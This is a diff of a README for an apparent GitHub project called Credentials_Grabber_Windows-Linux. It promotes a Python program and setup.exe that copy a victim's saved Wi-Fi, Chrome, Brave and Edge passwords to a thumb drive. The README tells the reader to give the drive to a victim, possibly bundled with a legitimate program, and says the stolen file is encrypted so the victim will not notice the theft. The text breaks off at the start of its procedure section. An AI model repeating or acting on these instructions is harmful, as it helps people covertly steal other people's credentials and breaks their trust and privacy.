prakharguptaujjain/Credentials_Grabber_Windows-Linux/README.md

 # Credentials_Grabber_Windows

+👋 Hi, I’m Prakhar Gupta

+A python program to copy all passwords from a victim pc to your pendrive

+the setup.exe and decrypter.exe are just the executable file of the main.py and decrypter.py respectively.

+Use-
-A person has to copy this program along with a legitimate program in his thumb drive and give it to a victim, which when runs that program on his pendrive grabs all the credentials like chrome passwords, wifi passwords etc.
+A person has to copy setup.exe software in his thumb drive and give it to a victim, when victim opens that program directly on his pendrive, the software grabs the credentials of wifi_passwords, Chrome, Brave, Edge saved passwords.
+The software save the passwords in ".data" file in pendrive.
+The text inside this file is encrypted so if bymistakely the victim opens this file he will not came to know that you have stolen his passwords.

+Full Procedure-
+First download the whole